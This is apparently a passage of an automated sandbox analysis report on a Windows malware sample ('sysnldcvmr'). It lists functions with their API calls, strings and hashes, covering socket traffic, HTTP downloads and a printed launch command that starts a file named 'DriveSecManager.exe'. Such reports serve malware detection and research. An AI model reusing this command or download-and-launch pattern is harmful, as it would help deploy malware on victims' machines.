                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                    • Opcode Fuzzy Hash: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488799664-0
                                                                                                                    • Opcode ID: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                    • Opcode Fuzzy Hash: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 673498613-0
                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                    Strings
                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3966618661-0
                                                                                                                    • Opcode ID: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                    • Opcode Fuzzy Hash: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 435966717-0
                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                      • Part of subcall function 0040A1B0: RtlFreeHeap.NTDLL(02190000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                    • Opcode ID: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                    • Opcode Fuzzy Hash: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2074799992-0
                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                    • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3668019968-0
                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2121970615-0
                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                    Function 0040D410 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(02190634), ref: 0040D429
                                                                                                                    • CloseHandle.KERNEL32(02190638), ref: 0040D458
                                                                                                                    • LeaveCriticalSection.KERNEL32(02190634), ref: 0040D467
                                                                                                                    • DeleteCriticalSection.KERNEL32(02190634), ref: 0040D474
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3102160386-0
                                                                                                                    • Opcode ID: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                    • Opcode Fuzzy Hash: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2223660684-0
                                                                                                                    • Opcode ID: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                    • Opcode Fuzzy Hash: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                    • String ID: %S%S
                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                    • Opcode ID: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                    • Opcode Fuzzy Hash: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,00000000,?), ref: 00405EBF
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
